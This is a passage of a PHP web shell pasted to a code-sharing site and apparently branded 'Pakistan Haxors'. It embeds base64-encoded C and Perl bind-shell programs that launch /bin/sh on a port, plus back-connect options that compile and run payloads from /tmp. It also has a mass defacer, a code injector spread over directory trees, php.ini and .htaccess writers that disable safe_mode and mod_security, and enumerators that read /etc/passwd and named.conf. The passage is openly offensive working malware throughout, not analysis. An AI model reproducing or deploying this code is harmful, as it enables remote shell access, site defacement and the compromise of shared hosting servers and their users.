  1219. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
  1220. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1221.  
  1222. echo '<h1>Network tools</h1><div class=content>
  1223. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
  1224. <br /><span>Bind port to /bin/sh</span><br/>
  1225. Port: <input type=\'text\' name=\'port\' value=\'443\'> Password: <input type=\'text\' name=\'pass\' value=\'Pakistan Haxors\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
  1226. </form>
  1227. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
  1228. <br /><br /><span>Back-connect to</span><br/>
  1229. Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'443\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>">
  1230. </form><br>';
  1231. if(isset($_POST['p1'])) {
  1232. function cf($f,$t) {
  1233. $w=@fopen($f,"w") or @function_exists('file_put_contents');
  1234. if($w) {
  1235. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  1236. @fclose($w);
  1237. }
  1238. }
  1239. if($_POST['p1'] == 'bpc') {
  1240. cf("/tmp/bp.c",$bind_port_c);
  1241. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
  1242. @unlink("/tmp/bp.c");
  1243. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  1244. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
  1245. }
  1246. if($_POST['p1'] == 'bpp') {
  1247. cf("/tmp/bp.pl",$bind_port_p);
  1248. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  1249. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
  1250. }
  1251. if($_POST['p1'] == 'bcc') {
  1252. cf("/tmp/bc.c",$back_connect_c);
  1253. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
  1254. @unlink("/tmp/bc.c");
  1255. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  1256. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
  1257. }
  1258. if($_POST['p1'] == 'bcp') {
  1259. cf("/tmp/bc.pl",$back_connect_p);
  1260. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  1261. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
  1262. }
  1263. }
  1264. echo '</div>';
  1265. printFooter();
  1266. }
  1267.  
  1268.  
  1269. function actionReadable() {
  1270. printHeader();
  1271. echo '<h1>Readable Dirs</h1>';
  1272. echo '<div class="content">';
  1273. $sm = ini_get('safe_mode');
  1274. if($sm) {
  1275. echo '<br /><b>Error: safe_mode = on</b><br /><br />';
  1276. } else {
  1277. @$passwd = file('/etc/passwd','r');
  1278. if (!$passwd) {
  1279. echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';
  1280. } else {
  1281. $pub = array();
  1282. $users = array();
  1283. $conf = array();
  1284. $i = 0;
  1285. foreach($passwd as $p) {
  1286. $r = explode(':',$p);
  1287. $dirz = $r[5].'/public_html/';
  1288. if(strpos($r[5],'home')) {
  1289. array_push($users,$r[0]);
  1290. if (is_readable($dirz)) {
  1291. array_push($pub,$dirz);
  1292. }
  1293. }
  1294. }
  1295. echo '<br><br>';
  1296. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1297. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
  1298. foreach ($pub as $user) {
  1299. echo $user."<br>";
  1300. }
  1301. echo "<br /><br /><br />[+] Complete...\n"."<br />";
  1302. }
  1303. }
  1304. echo '</div>';
  1305. printFooter();
  1306. }
  1307.  
  1308. function actionBypass() {
  1309. printHeader();
  1310. echo '<h1>Safe Mode</h1>';
  1311. echo '<div class="content">';
  1312. echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
  1313. echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
  1314. if(!empty($_POST['p2']) && isset($_POST['p2']))
  1315. {
  1316. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  1317. fwrite($fil,'<IfModule mod_security.c>
  1318. Sec------Engine Off
  1319. Sec------ScanPOST Off
  1320. </IfModule>');
  1321. fclose($fil);
  1322. }
  1323. if(!empty($_POST['p1'])&& isset($_POST['p1']))
  1324. {
  1325. $fil=fopen($GLOBALS['cwd']."php.ini","w");
  1326. fwrite($fil,'safe_mode=OFF
  1327. disable_functions=NONE');
  1328. fclose($fil);
  1329. }
  1330. if(!empty($_POST['p3']) && isset($_POST['p3']))
  1331. {
  1332. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  1333. fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
  1334. AddType application/x-httpd-cgi .sh
  1335. AddHandler cgi-script .pl
  1336. AddHandler cgi-script .pl');
  1337. fclose($fil);
  1338. }
  1339. echo "<br><br /><br /></div>";
  1340. echo '</div>';
  1341. printFooter();
  1342.  
  1343. }
  1344.  
  1345. function actionDeface() {
  1346. printHeader();
  1347. echo "<h1>Mass Defacer by SmEvK</h1><div class=content>";
  1348. ?>
  1349. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
  1350. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
  1351. <br>file name : <input type=text name=file size=20 value="index.php">
  1352. <br>Text Content : <input type=text name=Contents size=70 value="Add your deface txt here">
  1353. <br><input type=submit value="Deface now"></p></form>
  1354.  
  1355. <?php
  1356. if ($_POST['a'] == 'Deface') {
  1357. $mainpath = $_POST[p1];
  1358. $file = $_POST[p2];
  1359. $txtContents = $_POST[p3];
  1360. echo "Mass Defacer script by SmEVK_PaThAn";
  1361. $dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
  1362. while ($row = readdir($dir)) {
  1363. $start = @fopen("$row/$file", "w+");
  1364. $code = $txtContents;
  1365. $finish = @fwrite($start, $code);
  1366. if ($finish) {
  1367. echo "$row/$file > Done<br><br>";
  1368. }
  1369. }
  1370.  
  1371. }
  1372. echo '</div>';
  1373. printFooter();
  1374. }
  1375.  
  1376. function actionInjector(){
  1377. printHeader();
  1378. echo '<h1>Mass Code Injector</h1>';
  1379. echo '<div class="content">';
  1380.  
  1381. if(stristr(php_uname(),"Windows")) { $DS = "\\"; } else if(stristr(php_uname(),"Linux")) { $DS = '/'; }
  1382. function get_structure($path,$depth) {
  1383. global $DS;
  1384. $res = array();
  1385. if(in_array(0, $depth)) { $res[] = $path; }
  1386. if(in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) {
  1387. $tmp1 = glob($path.$DS.'*',GLOB_ONLYDIR);
  1388. if(in_array(1, $depth)) { $res = array_merge($res,$tmp1); }
  1389. }
  1390. if(in_array(2, $depth) or in_array(3, $depth)) {
  1391. $tmp2 = array();
  1392. foreach($tmp1 as $t){
  1393. $tp2 = glob($t.$DS.'*',GLOB_ONLYDIR);
  1394. $tmp2 = array_merge($tmp2, $tp2);
  1395. }
  1396. if(in_array(2, $depth)) { $res = array_merge($res,$tmp2); }
  1397. }
  1398. if(in_array(3, $depth)) {
  1399. $tmp3 = array();
  1400. foreach($tmp2 as $t){
  1401. $tp3 = glob($t.$DS.'*',GLOB_ONLYDIR);
  1402. $tmp3 = array_merge($tmp3, $tp3);
  1403. }
  1404. $res = array_merge($res,$tmp3);
  1405. }
  1406. return $res;
  1407. }
  1408.  
  1409. if(isset($_POST['submit']) && $_POST['submit']=='Inject') {
  1410. $name = $_POST['name'] ? $_POST['name'] : '*';
  1411. $type = $_POST['type'] ? $_POST['type'] : 'html';
  1412. $path = $_POST['path'] ? $_POST['path'] : getcwd();
  1413. $code = $_POST['code'] ? $_POST['code'] : 'Pakistan Haxors Crew';
  1414. $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
  1415. $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array('0');
  1416. $dt = get_structure($path,$depth);
  1417. foreach ($dt as $d) {
  1418. if($mode == 'a') {
  1419. if(file_put_contents($d.$DS.$name.'.'.$type, $code, FILE_APPEND)) {
  1420. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
  1421. } else {
  1422. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  1423. }
  1424. } else {
  1425. if(file_put_contents($d.$DS.$name.'.'.$type, $code)) {
  1426. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
  1427. } else {
  1428. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  1429. }
  1430. }
  1431. }
  1432. } else {
  1433. echo '<form method="post" action="">
  1434. <table align="center">
  1435. <tr>
  1436. <td>Directory : </td>
  1437. <td><input class="box" name="path" value="'.getcwd().'" size="50"/></td>
  1438. </tr>
  1439. <tr>
  1440. <td class="title">Mode : </td>
  1441. <td>
  1442. <select style="width: 100px;" name="mode" class="box">
  1443. <option value="a">Apender</option>
  1444. <option value="w">Overwriter</option>
  1445. </select>
  1446. </td>
  1447. </tr>
  1448. <tr>
  1449. <td class="title">File Name & Type : </td>
  1450. <td>
  1451. <input type="text" style="width: 100px;" name="name" value="*"/>&nbsp;&nbsp;
  1452. <select style="width: 100px;" name="type" class="box">
  1453. <option value="html">HTML</option>
  1454. <option value="htm">HTM</option>
  1455. <option value="php" selected="selected">PHP</option>
  1456. <option value="asp">ASP</option>
  1457. <option value="aspx">ASPX</option>
  1458. <option value="xml">XML</option>
  1459. <option value="txt">TXT</option>
  1460. </select></td>
  1461. </tr>
  1462. <tr>
  1463. <td class="title">Code Inject Depth : </td>
  1464. <td>
  1465. <input type="checkbox" name="depth[]" value="0" checked="checked"/>&nbsp;0&nbsp;&nbsp;
  1466. <input type="checkbox" name="depth[]" value="1"/>&nbsp;1&nbsp;&nbsp;
  1467. <input type="checkbox" name="depth[]" value="2"/>&nbsp;2&nbsp;&nbsp;
  1468. <input type="checkbox" name="depth[]" value="3"/>&nbsp;3
  1469. </td>
  1470. </tr>
  1471. <tr>
  1472. <td colspan="2"><textarea name="code" cols="70" rows="10" class="box"></textarea></td>
  1473. </tr>
  1474. <tr>
  1475. <td colspan="2" style="text-align: center;">
  1476. <input type="hidden" name="a" value="Injector">
  1477. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1478. <input type="hidden" name="p1">
  1479. <input type="hidden" name="p2">
  1480. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1481. <input style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
  1482. </tr>
  1483. </table>
  1484. </form>';
  1485. }
  1486. echo '</div>';
  1487. printFooter();
  1488. }
  1489.  
  1490.  
  1491. function actionDomain() {
  1492. printHeader();
  1493.  
  1494. echo '<h1>Local Domains</h1><div class=content>';
  1495. $file = @implode(@file("/etc/named.conf"));
  1496. $Domain_path = "/var/named";
  1497.  
  1498. if (!$file) {
  1499. $domains = scandir($Domain_path);
  1500. $count=1;
  1501. $dc = 0;
  1502. echo "<table align=center border=1 width=59% cellpadding=5>
  1503. <tr><td colspan=2>There are : ( <b>" . count($domains) . "</b> ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink. </td></tr>
  1504. <tr><td>No</td><td>Domain</td><td>User</td></tr>";
  1505. foreach ($domains as &$domain) {
  1506. if (stripos($domain,".db")) {
  1507. $domain = str_replace('.db','',$domain);
  1508.  
  1509. }
  1510. if (strlen($domain) > 6) {
  1511.  
  1512. echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>User</td></tr>";
  1513.  
  1514.  
  1515. }
  1516.  
  1517. }
  1518. echo "</table>";
  1519. }else{
  1520. $count = 1;
  1521. preg_match_all("#named/(.*?).db#", $file, $r);
  1522. $domains = array_unique($r[1]);
  1523. echo "<table align=center border=1 width=59% cellpadding=5>
  1524. <tr><td colspan=2> There are ( <b>" . count($domains) . "</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr>
  1525. <tr><td>No</td><td>Domain</td><td>User</td></tr>";
  1526. foreach ($domains as $domain) {
  1527.  
  1528. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
  1529. echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>".$user['name']."</td></tr>";
  1530. }
  1531. }
  1532.  
  1533. printFooter();
  1534. }
  1535.  
  1536. if( empty($_POST['a']) )
  1537. if(isset($default_action) && function_exists('action' . $default_action))
  1538. $_POST['a'] = $default_action;
  1539. else
  1540. $_POST['a'] = 'SecInfo';
  1541. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  1542. call_user_func('action' . $_POST['a'])
  1543.  
  1544. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!